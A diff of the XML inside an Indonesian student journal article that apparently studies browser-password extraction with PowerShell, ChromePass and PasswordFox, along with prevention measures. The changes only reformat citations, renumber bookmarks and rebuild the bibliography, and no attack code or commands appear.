--- a/1202164284_Abdul Azies Muslim_Jurnal.docx
+++ b/1202164284_Abdul Azies Muslim_Jurnal.docx
@@ -1168,7 +1168,27 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and run a Powershell script using a </w:t>
+        <w:t xml:space="preserve"> and run a Powershell script using </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1479,6 +1499,7 @@
           <w:id w:val="641777847"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1509,12 +1530,23 @@
           </w:r>
           <w:r>
             <w:rPr>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t xml:space="preserve"> (Net MarketShare, 2019)</w:t>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:color w:val="000000"/>
+              <w:sz w:val="20"/>
+              <w:szCs w:val="20"/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>[1]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -1663,6 +1695,7 @@
           <w:id w:val="-373309679"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1693,12 +1726,13 @@
           </w:r>
           <w:r>
             <w:rPr>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(W3Counter, 2019)</w:t>
+            <w:t>[2]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -1913,6 +1947,7 @@
           <w:id w:val="587281332"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1945,12 +1980,13 @@
           </w:r>
           <w:r>
             <w:rPr>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(Mateso, 2019)</w:t>
+            <w:t>[3]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -2153,6 +2189,7 @@
           <w:id w:val="487986904"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2183,12 +2220,13 @@
           </w:r>
           <w:r>
             <w:rPr>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(Cannols &amp; Ghafarian, 2017)</w:t>
+            <w:t>[4]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -3098,6 +3136,7 @@
           <w:id w:val="1403321989"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -3131,12 +3170,13 @@
           </w:r>
           <w:r>
             <w:rPr>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="id-ID"/>
             </w:rPr>
-            <w:t>(Hussain, Hammad, Hafeez, &amp; Zainab, 2016)</w:t>
+            <w:t>[5]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -3374,6 +3414,7 @@
           <w:id w:val="-1854949319"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -3410,13 +3451,13 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="id-ID"/>
             </w:rPr>
-            <w:t>(Louis, 2016)</w:t>
+            <w:t>[6]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -3668,6 +3709,7 @@
           <w:id w:val="-1651278877"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -3704,14 +3746,13 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
-              <w:iCs/>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="id-ID"/>
             </w:rPr>
-            <w:t>(Sofer, 2008)</w:t>
+            <w:t>[7]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4114,6 +4155,7 @@
           <w:id w:val="-1046056436"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4150,14 +4192,13 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
-              <w:iCs/>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(Hendler, Kels, &amp; Rubin, 2018)</w:t>
+            <w:t>[8]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4332,19 +4373,30 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:t>komputer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  Sistem operasi dapat mengatur waktu kerja, pengecekan kesalahan, mengelola input dan output, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>komputer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:iCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.  Sistem operasi dapat mengatur waktu kerja, pengecekan kesalahan, mengelola input dan output, penyimpanan, komplikasi serta pengolahan data. Secara umum, dapat disimpulkan bahwa </w:t>
+        <w:t xml:space="preserve">penyimpanan, komplikasi serta pengolahan data. Secara umum, dapat disimpulkan bahwa </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4470,6 +4522,7 @@
           <w:id w:val="185571289"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4506,14 +4559,13 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
-              <w:iCs/>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(Silberschatz, Gagne, &amp; Galvin, 2018)</w:t>
+            <w:t>[9]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4770,6 +4822,7 @@
           <w:id w:val="-1334455809"/>
           <w:citation/>
         </w:sdtPr>
+        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4806,14 +4859,13 @@
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
-              <w:iCs/>
+              <w:noProof/>
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>(Computer Hope, 2019)</w:t>
+            <w:t>[10]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -5902,8 +5954,6 @@
         </w:rPr>
         <w:t>...</w:t>
       </w:r>
-      <w:bookmarkStart w:id="11" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5932,7 +5982,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc43264847"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc43264847"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -5947,7 +5997,7 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6038,14 +6088,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc43264848"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc43264848"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Menjalankan ChromePass dan PasswordFox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6300,7 +6350,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc43264849"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc43264849"/>
       <w:bookmarkEnd w:id="10"/>
       <w:r>
         <w:rPr>
@@ -6316,7 +6366,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6493,7 +6543,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc43264863"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc43264863"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6845,19 +6895,19 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc43264864"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc43264864"/>
+      <w:bookmarkEnd w:id="14"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Analisis Interupsi</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="15"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Analisis Interupsi</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7093,7 +7143,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc43264865"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc43264865"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7104,7 +7154,7 @@
         </w:rPr>
         <w:t>Analisis Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8182,7 +8232,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc43264866"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc43264866"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -8193,7 +8243,7 @@
         </w:rPr>
         <w:t>Rekomendasi Untuk Mencegah Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9281,603 +9331,742 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="a0"/>
-        <w:tblW w:w="9299" w:type="dxa"/>
-        <w:tblInd w:w="126" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:insideH w:val="nil"/>
-          <w:insideV w:val="nil"/>
-        </w:tblBorders>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="544"/>
-        <w:gridCol w:w="8755"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="225"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="544" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="205" w:lineRule="auto"/>
-              <w:ind w:right="108"/>
-              <w:jc w:val="right"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[1]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8755" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="205" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ludeman, L. C.. 1987. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Fundamental of Digital Signal Processing</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>. Singapore : John Wiley &amp; Sons, Inc.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="459"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="544" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="226" w:lineRule="auto"/>
-              <w:ind w:right="108"/>
-              <w:jc w:val="right"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[2]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8755" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="226" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Ochoa H, dan Rao K R. 2003. A Hybrid DWT-SVD Image-Coding System (HDWTSVD) for</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="214" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Color Images. Systemics. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Cybernetics and Informatics.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">1:2 </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>64-69</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="459"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="544" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="224" w:lineRule="auto"/>
-              <w:ind w:right="108"/>
-              <w:jc w:val="right"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[3]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8755" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="1185"/>
-                <w:tab w:val="left" w:pos="1662"/>
-                <w:tab w:val="left" w:pos="2406"/>
-                <w:tab w:val="left" w:pos="3075"/>
-                <w:tab w:val="left" w:pos="3822"/>
-                <w:tab w:val="left" w:pos="4748"/>
-                <w:tab w:val="left" w:pos="5452"/>
-                <w:tab w:val="left" w:pos="6318"/>
-                <w:tab w:val="left" w:pos="7287"/>
-                <w:tab w:val="left" w:pos="8355"/>
-              </w:tabs>
-              <w:spacing w:line="224" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Rahardjo,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>B.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>2008.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Pola</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>Akses</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>Internet</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>Yang</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>Bursty</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[Online]</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>Available</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>at:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="215" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:hyperlink r:id="rId15">
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="1509089513"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Bibliographies"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:sdt>
+          <w:sdtPr>
+            <w:id w:val="111145805"/>
+            <w:bibliography/>
+          </w:sdtPr>
+          <w:sdtEndPr>
+            <w:rPr>
+              <w:b w:val="0"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:sdtEndPr>
+          <w:sdtContent>
+            <w:p>
+              <w:pPr>
+                <w:pStyle w:val="Heading1"/>
+                <w:rPr>
+                  <w:noProof/>
+                </w:rPr>
+              </w:pPr>
               <w:r>
                 <w:rPr>
-                  <w:color w:val="000000"/>
-                  <w:sz w:val="20"/>
-                  <w:szCs w:val="20"/>
+                  <w:b w:val="0"/>
                 </w:rPr>
-                <w:t xml:space="preserve">http://rahard.wordpress.com/2011/04/04/pola-akses-internet-yang-bursty/ </w:t>
+                <w:fldChar w:fldCharType="begin"/>
               </w:r>
-            </w:hyperlink>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[Accessed 3 March 2011].</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="225"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="544" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="205" w:lineRule="auto"/>
-              <w:ind w:right="108"/>
-              <w:jc w:val="right"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>[4]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8755" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="205" w:lineRule="auto"/>
-              <w:ind w:left="109"/>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>…</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:before="1"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:ind w:left="318" w:right="105"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Penyusunan rujukan dalam daftar pustaka berurut berdasarkan abjad nama pengarang dan diberi nomor angka arab dalam kurung siku. Penulisan unsur-unsur keterangan pustaka mengikuti kaidah dengan urutan: (1) nama pengarang ditulis dengan urutan nama akhir, na</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
